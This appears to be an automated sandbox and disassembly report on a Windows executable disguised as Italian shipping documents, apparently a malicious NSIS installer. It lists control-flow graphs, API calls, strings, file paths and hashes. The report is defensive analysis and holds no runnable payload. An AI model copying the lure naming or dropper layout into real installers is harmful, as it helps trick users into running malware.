                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                        • API String ID: 1975747703-3919183028
                                        • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                        • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                        • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                        • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 511 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 514 4030d2-4030d7 511->514 515 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 511->515 516 4032b2-4032b6 514->516 523 403110 515->523 524 4031f5-403203 call 40301e 515->524 525 403115-40312c 523->525 530 403205-403208 524->530 531 403258-40325d 524->531 528 403130-403139 call 4034d4 525->528 529 40312e 525->529 537 40325f-403267 call 40301e 528->537 538 40313f-403146 528->538 529->528 533 40320a-403222 call 4034ea call 4034d4 530->533 534 40322c-403256 GlobalAlloc call 4034ea call 4032b9 530->534 531->516 533->531 557 403224-40322a 533->557 534->531 562 403269-40327a 534->562 537->531 541 4031c2-4031c6 538->541 542 403148-40315c call 406002 538->542 547 4031d0-4031d6 541->547 548 4031c8-4031cf call 40301e 541->548 542->547 560 40315e-403165 542->560 553 4031e5-4031ed 547->553 554 4031d8-4031e2 call 406a38 547->554 548->547 553->525 561 4031f3 553->561 554->553 557->531 557->534 560->547 566 403167-40316e 560->566 561->524 563 403282-403287 562->563 564 40327c 562->564 567 403288-40328e 563->567 564->563 566->547 568 403170-403177 566->568 567->567 569 403290-4032ab SetFilePointer call 406002 567->569 568->547 570 403179-403180 568->570 574 4032b0 569->574 570->547 572 403182-4031a2 570->572 572->531 573 4031a8-4031ac 572->573 575 4031b4-4031bc 573->575 576 4031ae-4031b2 573->576 574->516 575->547 577 4031be-4031c0 575->577 576->561 576->575 577->547
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403093
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,00000400), ref: 004030AF
                                          • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 0040604B
                                          • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 004030FB
                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                        Strings
                                        • Inst, xrefs: 00403167
                                        • C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                        • C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
                                        • "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", xrefs: 00403088
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                        • soft, xrefs: 00403170
                                        • Error launching installer, xrefs: 004030D2
                                        • Null, xrefs: 00403179
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 2803837635-3691143469
                                        • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                        • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                        • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                        • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 642 406594-40659d 643 4065b0-4065ca 642->643 644 40659f-4065ae 642->644 645 4065d0-4065dc 643->645 646 4067da-4067e0 643->646 644->643 645->646 647 4065e2-4065e9 645->647 648 4067e6-4067f3 646->648 649 4065ee-4065fb 646->649 647->646 651 4067f5-4067fa call 406557 648->651 652 4067ff-406802 648->652 649->648 650 406601-40660a 649->650 653 406610-406653 650->653 654 4067c7 650->654 651->652 658 406659-406665 653->658 659 40676b-40676f 653->659 656 4067d5-4067d8 654->656 657 4067c9-4067d3 654->657 656->646 657->646 660 406667 658->660 661 40666f-406671 658->661 662 406771-406778 659->662 663 4067a3-4067a7 659->663 660->661 668 406673-406691 call 406425 661->668 669 4066ab-4066ae 661->669 666 406788-406794 call 406557 662->666 667 40677a-406786 call 40649e 662->667 664 4067b7-4067c5 lstrlenW 663->664 665 4067a9-4067b2 call 406594 663->665 664->646 665->664 676 406799-40679f 666->676 667->676 681 406696-406699 668->681 670 4066b0-4066bc GetSystemDirectoryW 669->670 671 4066c1-4066c4 669->671 677 40674e-406751 670->677 678 4066d6-4066da 671->678 679 4066c6-4066d2 GetWindowsDirectoryW 671->679 676->664 682 4067a1 676->682 683 406763-406769 call 406805 677->683 684 406753-406756 677->684 678->677 685 4066dc-4066fa 678->685 679->678 681->684 686 40669f-4066a6 call 406594 681->686 682->683 683->664 684->683 688 406758-40675e lstrcatW 684->688 690 4066fc-406702 685->690 691 40670e-406726 call 40694b 685->691 686->677 688->683 695 40670a-40670c 690->695 699 406728-40673b SHGetPathFromIDListW CoTaskMemFree 691->699 700 40673d-406746 691->700 695->691 697 406748-40674c 695->697 697->677 699->697 699->700 700->685 700->697
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(Exec,00000400), ref: 004066B6
                                        • GetWindowsDirectoryW.KERNEL32(Exec,00000400,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,?,?,00000000,00000000,00424620,74DF23A0), ref: 004066CC
                                        • SHGetPathFromIDListW.SHELL32(00000000,Exec), ref: 0040672A
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                        • lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,?,?,00000000,00000000,00424620,74DF23A0), ref: 0040675E
                                        • lstrlenW.KERNEL32(Exec,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,?,?,00000000,00000000,00424620,74DF23A0), ref: 004067B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: Exec$Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-971762196
                                        • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                        • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                        • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                        • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 701 4032b9-4032d0 702 4032d2 701->702 703 4032d9-4032e2 701->703 702->703 704 4032e4 703->704 705 4032eb-4032f0 703->705 704->705 706 403300-40330d call 4034d4 705->706 707 4032f2-4032fb call 4034ea 705->707 711 4034c2 706->711 712 403313-403317 706->712 707->706 713 4034c4-4034c5 711->713 714 40346d-40346f 712->714 715 40331d-403366 GetTickCount 712->715 718 4034cd-4034d1 713->718 716 403471-403474 714->716 717 4034af-4034b2 714->717 719 4034ca 715->719 720 40336c-403374 715->720 716->719 723 403476 716->723 721 4034b4 717->721 722 4034b7-4034c0 call 4034d4 717->722 719->718 724 403376 720->724 725 403379-403387 call 4034d4 720->725 721->722 722->711 733 4034c7 722->733 727 403479-40347f 723->727 724->725 725->711 735 40338d-403396 725->735 730 403481 727->730 731 403483-403491 call 4034d4 727->731 730->731 731->711 739 403493-40349f call 4060f9 731->739 733->719 736 40339c-4033bc call 406aa6 735->736 743 4033c2-4033d5 GetTickCount 736->743 744 403465-403467 736->744 745 4034a1-4034ab 739->745 746 403469-40346b 739->746 747 403420-403422 743->747 748 4033d7-4033df 743->748 744->713 745->727 749 4034ad 745->749 746->713 752 403424-403428 747->752 753 403459-40345d 747->753 750 4033e1-4033e5 748->750 751 4033e7-403418 MulDiv wsprintfW call 4055dc 748->751 749->719 750->747 750->751 759 40341d 751->759 756 40342a-403431 call 4060f9 752->756 757 40343f-40344a 752->757 753->720 754 403463 753->754 754->719 762 403436-403438 756->762 758 40344d-403451 757->758 758->736 761 403457 758->761 759->747 761->719 762->746 763 40343a-40343d 762->763 763->758
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: *B$ FB$ A$ A$... %d%%
                                        • API String ID: 551687249-3833040932
                                        • Opcode ID: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                        • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                        • Opcode Fuzzy Hash: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                        • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 401774-401799 call 402dab call 405e9d 769 4017a3-4017b5 call 406557 call 405e26 lstrcatW 764->769 770 40179b-4017a1 call 406557 764->770 775 4017ba-4017bb call 406805 769->775 770->775 779 4017c0-4017c4 775->779 780 4017c6-4017d0 call 4068b4 779->780 781 4017f7-4017fa 779->781 789 4017e2-4017f4 780->789 790 4017d2-4017e0 CompareFileTime 780->790 782 401802-40181e call 406047 781->782 783 4017fc-4017fd call 406022 781->783 791 401820-401823 782->791 792 401892-4018bb call 4055dc call 4032b9 782->792 783->782 789->781 790->789 793 401874-40187e call 4055dc 791->793 794 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 791->794 804 4018c3-4018cf SetFileTime 792->804 805 4018bd-4018c1 792->805 806 401887-40188d 793->806 794->779 826 401869-40186a 794->826 808 4018d5-4018e0 CloseHandle 804->808 805->804 805->808 809 402c38 806->809 811 4018e6-4018e9 808->811 812 402c2f-402c32 808->812 813 402c3a-402c3e 809->813 815 4018eb-4018fc call 406594 lstrcatW 811->815 816 4018fe-401901 call 406594 811->816 812->809 823 401906-4023a7 call 405bb7 815->823 816->823 823->812 823->813 826->806 828 40186c-40186d 826->828 828->793
                                        APIs
                                        • lstrcatW.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform,?,?,00000031), ref: 004017B5
                                        • CompareFileTime.KERNEL32(-00000014,?,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform,?,?,00000031), ref: 004017DA
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp$C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll$C:\Users\user\AppData\Local\acneform$Exec
                                        • API String ID: 1941528284-2668649051
                                        • Opcode ID: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
                                        • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                        • Opcode Fuzzy Hash: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
                                        • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 830 4055dc-4055f1 831 4055f7-405608 830->831 832 4056a8-4056ac 830->832 833 405613-40561f lstrlenW 831->833 834 40560a-40560e call 406594 831->834 836 405621-405631 lstrlenW 833->836 837 40563c-405640 833->837 834->833 836->832 838 405633-405637 lstrcatW 836->838 839 405642-405649 SetWindowTextW 837->839 840 40564f-405653 837->840 838->837 839->840 841 405655-405697 SendMessageW * 3 840->841 842 405699-40569b 840->842 841->842 842->832 843 40569d-4056a0 842->843 843->832
                                        APIs
                                        • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                        • lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                        • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0), ref: 00405637
                                        • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 00405649
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll
                                        • API String ID: 2531174081-1389409888
                                        • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                        • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                        • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                        • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 844 4068db-4068fb GetSystemDirectoryW 845 4068fd 844->845 846 4068ff-406901 844->846 845->846 847 406912-406914 846->847 848 406903-40690c 846->848 849 406915-406948 wsprintfW LoadLibraryExW 847->849 848->847 850 40690e-406910 848->850 850->849
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                        • wsprintfW.USER32 ref: 0040692D
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME
                                        • API String ID: 2200240437-1106614640
                                        • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                        • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                        • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                        • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 851 402eae-402ed7 call 4063c4 853 402edc-402ee0 851->853 854 402f91-402f95 853->854 855 402ee6-402eea 853->855 856 402eec-402f0d RegEnumValueW 855->856 857 402f0f-402f22 855->857 856->857 858 402f76-402f84 RegCloseKey 856->858 859 402f4b-402f52 RegEnumKeyW 857->859 858->854 860 402f24-402f26 859->860 861 402f54-402f66 RegCloseKey call 40694b 859->861 860->858 862 402f28-402f3c call 402eae 860->862 867 402f86-402f8c 861->867 868 402f68-402f74 RegDeleteKeyW 861->868 862->861 869 402f3e-402f4a 862->869 867->854 868->854 869->859
                                        APIs
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
